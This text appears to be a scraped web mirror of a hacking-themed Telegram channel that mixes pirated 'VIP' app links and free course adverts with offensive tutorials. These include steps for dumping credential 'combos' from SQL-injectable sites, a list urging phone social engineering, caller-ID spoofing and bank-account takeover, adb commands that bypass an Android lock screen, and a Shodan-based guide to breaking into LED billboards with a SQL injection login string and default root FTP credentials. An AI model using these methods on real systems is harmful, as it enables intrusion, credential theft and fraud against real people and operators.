WebTg - Web Telegram

#ID: ethicalhackerscommunity

Let's work work together and boost you true hacking capability to it's full potential ;)...

View In Telegram

                    📳 SnapTube – YouTube Downloader HD Video v4.82.1.4820801[Vip] [Latest] apk🔰

🖍  VIP Premium features :-
▫️No banner ads.
▫️Permanently remove app ads
▫️Enable ‘Batch download’ feature
▫️Enable ‘2K, 4K & 8K’ download option for some HD videos.

🌀 Download Link 🔗 :- https://bit.ly/2ShK11x

♻️ Share and Support Us
                    🔰How to hack facebook account using brute force attack in android phone🔰

▫️All errors solved 
▫️New script 
▫️easy to use 
▫️hack using termux 

⭕️ Link 🔗 :- https://youtu.be/ZW6HdQd5ELg

♻️ Share and Support Us 

                    🔰Learn to Code with Python 3!🔰

〽️Go from beginner to advanced with the Python programming language!

⭕️What you'll learn :

▫️Introduction to Python and Setup
▫️Python Programming Basics
▫️Functions - Coding Exercises
▫️Lists, Tuples and Dictionaries
▫️Files in Python 3
▫️Error Handling
▫️Object Oriented Programming
▫️Date & Time
▫️Regular Expressions
▫️Interacting with HTTP
▫️Networking in Python 3
▫️E-mails, PDFs, Images

🌀 Enroll Course 🔗 :- https://gplinks.in/LearntoCodewithPython3

♻️ Share and Support us 

                    💡Did you know that if you are a member of this community you can add members?
...try adding your friends here and chat😃
                    🔰The Complete Python 3 Course: Beginner to Advanced!🔰

〽️Learn Python with projects covering game & web development, web scraping, MongoDB, Django, PyQt, and data visualization!

🔻Course Price :- ₹12,480 , now coupon applyed so it's free for 12 hours, Grab it Fast ❗️

⭕️What you'll learn

▫️Install Python
▫️Setup an IDE
▫️Use programming fundamentals to build a calculator
▫️Use advanced Python concepts to code a RPG
▫️Find additional packages to expand the functionality of Python
▫️Install essential modules
▫️Code an app for web scraping
▫️Create a NoSQL database using PyMongo
▫️Create web apps using Web.py
▫️Django web server setup
▫️Live troubleshooting

🌀 Enroll Course 🔗 :- https://gplinks.in/FreeUdemyCourse

♻️ Share and Support Us 

                    WHAT IS A VPN AND WHY YOU NEED IT.

A virtual private network (VPN) gives you online privacy and anonymity by creating a private network from a public internet connection. VPNs mask your internet protocol (IP) address so your online actions are virtually untraceable. Most important, VPN services establish secure and encrypted connections to provide greater privacy than even a secured Wi-Fi hotspot.

Why do you need a VPN service?

Surfing the web or transacting on an unsecured Wi-Fi network means you could be exposing your private information and browsing habits. That’s why a virtual private network, better known as a VPN, should be a must for anyone concerned about their online security and privacy.

Think about all the times you’ve been on the go, reading emails while in line at the coffee shop, or checking your bank account while waiting at the doctor’s office. Unless you were logged into a private Wi-Fi network that requires a password, any data transmitted during your online session could be vulnerable to eavesdropping by strangers using the same network.

The encryption and anonymity that a VPN provides helps protect your online activities: sending emails, shopping online, or paying bills. VPNs also help keep your web browsing anonymous.

How a VPN protects your IP address and privacy

VPNs essentially create a data tunnel between your local network and an exit node in another location, which could be thousands of miles away, making it seem as if you’re in another place. This benefit allows online freedom, or the ability to access your favorite apps and websites while on the go.

Here’s a closer look at how a virtual private network works. VPNs use encryption to scramble data when it’s sent over a Wi-Fi network. Encryption makes the data unreadable. Data security is especially important when using a public Wi-Fi network, because it prevents anyone else on the network from eavesdropping on your internet activity.

There’s another side to privacy. Without a VPN, your internet service provider can know your entire browsing history. With a VPN, your search history is hidden. That’s because your web activity will be associated with the VPN server’s IP address, not yours. A VPN service provider may have servers all over the world. That means your search activity could appear to originate at any one of them. Keep in mind, search engines also track your search history, but they’ll associate that information with an IP address that’s not yours. Again, your VPN will keep your online activity private.

VPN privacy: What does a VPN hide?

A VPN can hide a lot of information that can put your privacy at risk. Here are five of them.

1. Your browsing history

It’s no secret where you go on the internet. Your internet service provider and your web browser can track just about everything you do on the internet. A lot of the websites you visit can also keep a history. Web browsers can track your search history and tie that information to your IP address.

Here are two examples why you may want to keep your browsing history private. Maybe you have a medical condition and you’re searching the web for information about treatment options. Guess what? Without a VPN, you’ve automatically shared that information and may start receiving targeted ads that could draw further attention to your condition.

Or maybe you just want to price airline tickets for a flight next month. The travel sites you visit know you’re looking for tickets and they might display fares that aren’t the cheapest available.

These are just a few isolated examples. Keep in mind your internet service provider may be able to sell your browsing history. Even so-called private browsers may not be so private.

2. Your IP address and location

Anyone who captures your IP address can access what you’ve been searching on the internet and where you were located when you searched. Think of your IP address as the return address you’d put on a letter. It leads back to your device.

Since a VPN uses an IP address that’s not your own, it allows you to maintain your online privacy
                    🔰 Spotify premium🔰

                    🔰How to make website in 9 minutes using android phone🔰

〽️ Easy way to create your website for free in less minutes 

⭕️ Link 🔗 :- https://youtu.be/8CceQERvT6s

🔺Share and Support Us🔻

                    What is a wireless network?

A wireless network is a network that uses radio waves to link computers and other devices together. The implementation is done at the Layer 1 (physical layer) of the OSI model.
How to access a wireless network?
You will need a wireless network enabled device such as a laptop, tablet, smartphones, etc. You will also need to be within the transmission radius of a wireless network access point. Most devices (if the wireless network option is turned on) will provide you with a list of available networks. If the network is not password protected, then you just have to click on connect. If it is password protected, then you will need the password to gain access.

Wireless Network Authentication
Since the network is easily accessible to everyone with a wireless network enabled device, most networks are password protected. Let’s look at some of the most commonly used authentication techniques.

WEP is the acronym for Wired Equivalent Privacy. It was developed for IEEE 802.11 WLAN standards. Its goal was to provide the privacy equivalent to that provided by wired networks. WEP works by encrypting the data been transmitted over the network to keep it safe from eavesdropping. 

WEP Authentication

Open System Authentication (OSA) – this methods grants access to station authentication requested based on the configured access policy.

Shared Key Authentication (SKA) – This method sends to an encrypted challenge to the station requesting access. The station encrypts the challenge with its key then responds. If the encrypted challenge matches the AP value, then access is granted.

WEP Weakness

WEP has significant design flaws and vulnerabilities.

The integrity of the packets is checked using Cyclic Redundancy Check (CRC32). CRC32 integrity check can be compromised by capturing at least two packets. The bits in the encrypted stream and the checksum can be modified by the attacker so that the packet is accepted by the authentication system. This leads to unauthorized access to the network.
WEP uses the RC4 encryption algorithm to create stream ciphers. The stream cipher input is made up of an initial value (IV) and a secret key. The length of the initial value (IV) is 24 bits long while the secret key can either be 40 bits or 104 bits long. The total length of both the initial value and secret can either be 64 bits or 128 bits long.The lower possible value of the secret key makes it easy to crack it.
Weak Initial values combinations do not encrypt sufficiently. This makes them vulnerable to attacks.
WEP is based on passwords; this makes it vulnerable to dictionary attacks.
Keys management is poorly implemented. Changing keys especially on large networks is challenging. WEP does not provide a centralized key management system.
The Initial values can be reused
Because of these security flaws, WEP has been deprecated in favor of WPA
                    How to track a lost phone
You can track a lost phone through the android website.
On a computer or another phone, type android.com/find on the web browser
It will prompt you to log in to your Google account.
If your phone was logged onto your Gmail, you can easily track it by typing ‘Find my phone” on Google search.
You will see the location of your lost device if it is still connected to the internet and if the Location feature was enabled when you lost it.
Always remember to enabling the location feature on your Android or iPhone as it pinpoints the exact location.
International Mobile Equipment Identity (IMEI) is a unique number for each mobile phone, according to Digital Trends.
IMEI numbers for cellular phones connected to a GSM network are stored in a database. To know your IMEI number, dial *#06#.

It is very important to note down this number because it could help you when you lose your device.
                    🔰How To Make Combos🔰

◾️ Steps

1 - Download Good dorks
2- Download Sqli Dumper v8.3
3- Download Good proxies
4- Open SQLI Dumper and go to the proxies tab and put your own proxies in it [ Tools and settings ====> Proxies ]4
5- return back to the Url Tab and Put your own dorks in the blank white paper
6- click on start scanner and make sure to make the 1 value into 10 for better scanning
7- let it some time until you collect maybe 10,000 urls
8- stop scanner and go to exploitables and Click on start exploiting
9 - it will search for some website that are injected with the exploit
10 - after you collect maybe 20 Website
11- go to Injectables and click on the same button
12- It will scan for the websites which have databases [ combos ]
13- once you collect maybe 5 website start dumping 
14- Congratulations your combos is Ready
#How_To_Became_A_Great_hacker ?
1. Learn TCP/IP, Basic Information
gathering, Proxies, Socks, SSL, VPN, VPS, RDP,
FTP, POP3, SMTP, Telnet, SSH.
2. Learn Linux, Unix, Windows - You can do
this using vmware or any virtual desktop
3. Learn a programming language that's
compatible with all OS - Perl, Python, C, ASM
4. Learn HTML, PHP, Javascript, ASP, XML, SQL,
5. Learn Reverse engineering and crack
some programs for serials easy ones like
mirc, winzip, winrar or old games.
6. Code a fuzzer for common protocols - ftp,
pop3, 80, 8080 - Pick some free software
like ftp server, mail server, apache or iis
webserver or a webserver all-in-one pack,
or teamspeak, ventrilo, mumble.
7. Code a tool that uses grep to sort out
unique code in source codes.
8. Make a custom IPtable, IPsec firewall that
blocks all incoming traffic and out going
traffic and add filters to accept certain ports
that your software or scripts use.
9. Pick a kernel in linux or unix, also pick a
Microsoft OS version lets say Winxp pro sp2
put them on the virtual desktops (vmware)
and find and code a new local exploit in
those versions, then install a Apache
webserver on the Linux/Unix and a IIS
webserver on the winxp pro and attempt to
find and code a new local reverse_tcp_shell
10. Learn Cisco Router and Switch
configuration and setup.
11. Learn Checkpoint Setup and Config
12. Learn Wifi scanning, cracking, sniffing.
13. Pick a person in you phonebook for the
area code you live in or city then ring the
person on a anonymous line like skype or a
payphone or a carded sim and attempt to
social engineer the person for his name,
address, data of birth, city born, country
born, ISP connected with, Phone company
connected with, What bank he/she uses
and anything else you can get. Then
Attempt to ring using a spoof caller ID
software with the person's phone number -
call the ISP and try reset the password to
his/her internet connection/web-mail, get
access to bank account or ask them to send
out a new *** to a new address (drop)
with a new pin, reset of phone company
14. Use your information gathering skills to
get all the information off a website like a
shop then use the spoof caller-id software
or hack your phone to show a new number
of the Webserver's Tech Support number
then ring the shop owner and try get the
shop site password.
15. Do the same thing but attempt to use a
web attack against a site or shop to gain
admin access.
16. Once got access upload a shell and
attempt to exploit the server to gain root
using a exploit you coded not someone else
s exploit.
17. Make your own Linux Distro
18. Use your own Linux Distro or use a
vanilla Linux gnome (not kde) keep itwith
not much graphics so you can learn how to
depend on the terminal and start from
scratch install applications that you will only
need for a blackbox (Security test box),
make folders for fuzzers, exploits,
scanners..etc Then load them up with your
own scripts and other tools ( By this stage
you shouldn't need to depend on other
peoples scripts).
19. Learn macosx and attempt to gain
access to a Macosx box whether it be your
own or someone's else.
20. Create a secure home network and
secure your own systems with your own
Security policies and firewall settings.》》》》


   1️⃣ Connect your android phone to you computer.

   2️⃣ Open Commande prompt administrator.

   3️⃣ Now in command prompt window type following code carefully  adb shell cd/data/data/com.android.providers.settings/databases sqlites settings.db  update system set value=0 where name=’lockpatternautolock’; update system set value=0 where name=’lockscreen.lockedoutpermanently’; .quit

   4️⃣ Now you will see some screen as shown below and then you can reboot your phone and now when your android starts again, then try unlocking it using any random pattern and it will unlock and work pretty fine.

   5️⃣  If you face any problem repeat same steps but instead of the above code tru using  adb shell rm/data/system/gesture.key and the press enter and now reboot your device to see if it works.
                    🦉[TUT] How to Hack Billboards🦉

Step 1. Register to shodan

Step 2. Look up: title:"lednet live system"

You'll find some!


How to hack it? Well the Username Parameter is vulnerable to SQL Injection......

So to login, paste

-1558" OR 9005=9005 AND "UxGI"="UxGI

in the username parameter and anything in the password input. Now click login!

Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards....

Username: root
Password: 111111

$ ftp
Connected to
220 Welcome to blah FTP service.
Name ( root
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41314|).
150 Here comes the directory listing.
drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
drwxr-xr-x 7 0 0 0 May 21 18:08 dev
lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
drwxr-xr-x 1 0 0 36 Jan 01 1970 home
drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
drwxr-xr-x 1 0 0 116 Jan 01 1970 root
drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
drwxr-xr-x 3 0 0 672 Jan 01 1970 var
drwxr-xr-x 4 0 0 288 Jan 01 1970 www
226 Directory send OK.

You now have access to the entire server ;)